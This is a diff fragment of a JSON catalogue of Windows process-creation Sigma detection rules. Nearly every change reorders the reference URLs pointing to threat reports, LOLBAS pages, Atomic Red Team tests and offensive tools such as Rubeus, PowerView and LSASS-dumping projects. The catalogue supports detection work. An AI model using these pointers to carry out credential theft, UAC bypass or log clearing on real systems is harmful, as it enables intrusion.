"https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", + "https://github.com/fireeye/DueDLLigence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" ], "tags": [ @@ -57003,8 +57027,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", "https://github.com/tevora-threat/SharpView/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" ], "tags": [ @@ -57055,8 +57079,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" ], "tags": [ @@ -57081,8 +57105,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", - "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" ], "tags": [ @@ -57182,8 +57206,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", "https://attack.mitre.org/software/S0108/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" ], "tags": [ @@ -57217,8 +57241,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/msbuild.exe", "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", + "https://www.echotrail.io/insights/search/msbuild.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" ], "tags": [ @@ -57341,8 +57365,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", "https://twitter.com/cglyer/status/1183756892952248325", + "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" ], "tags": [ @@ -57367,9 +57391,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/defaultnamehere/cookie_crimes/", - "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", + "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml" ], "tags": [ @@ -57600,8 +57624,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" ], "tags": [ @@ -57624,8 +57648,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/476188/1/iochtml", "https://twitter.com/neonprimetime/status/1435584010202255375", + "https://www.joesandbox.com/analysis/476188/1/iochtml", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" ], @@ -57694,8 +57718,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" ], "tags": [ @@ -57720,9 +57744,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", - "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" ], "tags": [ @@ -57917,8 +57941,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" ], "tags": [ @@ -58085,8 +58109,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" ], "tags": [ @@ -58119,8 +58143,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" ], "tags": [ @@ -58213,8 +58237,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ @@ -58298,8 +58322,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", - "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" ], @@ -58349,8 +58373,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" ], @@ -58465,8 +58489,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/kmkz_security/status/1220694202301976576", "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", + "https://twitter.com/kmkz_security/status/1220694202301976576", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" ], "tags": [ @@ -58536,8 +58560,8 @@ "logsource.product": "windows", "refs": [ "http://www.xuetr.com/", - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" ], "tags": "No established tags" @@ -58559,11 +58583,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://ngrok.com/docs", "https://twitter.com/xorJosh/status/1598646907802451969", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" @@ -58645,9 +58669,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" ], @@ -58681,8 +58705,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" ], "tags": [ @@ -58884,8 +58908,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" ], @@ -58909,9 +58933,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://twitter.com/0gtweet/status/1564968845726580736", "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" ], "tags": [ @@ -59004,9 +59028,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" ], @@ -59108,9 +59132,9 @@ "logsource.product": "windows", "refs": [ "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", - "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" ], "tags": [ @@ -59328,8 +59352,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" ], "tags": [ @@ -59521,8 +59545,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/GhostPack/Rubeus", "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", + "https://github.com/GhostPack/Rubeus", "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" ], @@ -59635,10 +59659,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" ], @@ -59880,8 +59904,8 @@ "refs": [ "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", - "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" ], "tags": [ @@ -59971,8 +59995,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" ], "tags": [ @@ -60074,8 +60098,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" ], "tags": [ @@ -60110,8 +60134,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_shtinkering.yml" ], "tags": [ @@ -60186,8 +60210,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://emkc.org/s/RJjuLa", "https://redcanary.com/blog/chromeloader/", + "https://emkc.org/s/RJjuLa", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" ], "tags": [ @@ -60287,8 +60311,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" ], "tags": [ @@ -60324,8 +60348,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" ], "tags": [ @@ -60425,8 +60449,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_st0pp3r_/status/1560072680887525378", "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://twitter.com/_st0pp3r_/status/1560072680887525378", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" ], "tags": [ @@ -60468,8 +60492,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" ], "tags": [ @@ -60561,8 +60585,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" ], "tags": [ @@ -60694,10 +60718,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" ], "tags": [ @@ -60796,8 +60820,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" ], "tags": [ @@ -60992,9 +61016,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" ], "tags": [ @@ -61186,8 +61210,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" ], "tags": [ @@ -61270,9 +61294,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -61296,9 +61320,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" ], "tags": [ @@ -61414,8 +61438,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" ], "tags": [ @@ -62088,11 +62112,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ @@ -62579,8 +62603,8 @@ "refs": [ "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", - "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/nao_sec/status/1530196847679401984", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" ], "tags": [ @@ -62639,8 +62663,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" ], "tags": [ @@ -62790,10 +62814,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://twitter.com/splinter_code/status/1483815103279603714", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" ], "tags": "No established tags" @@ -62814,8 +62838,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", 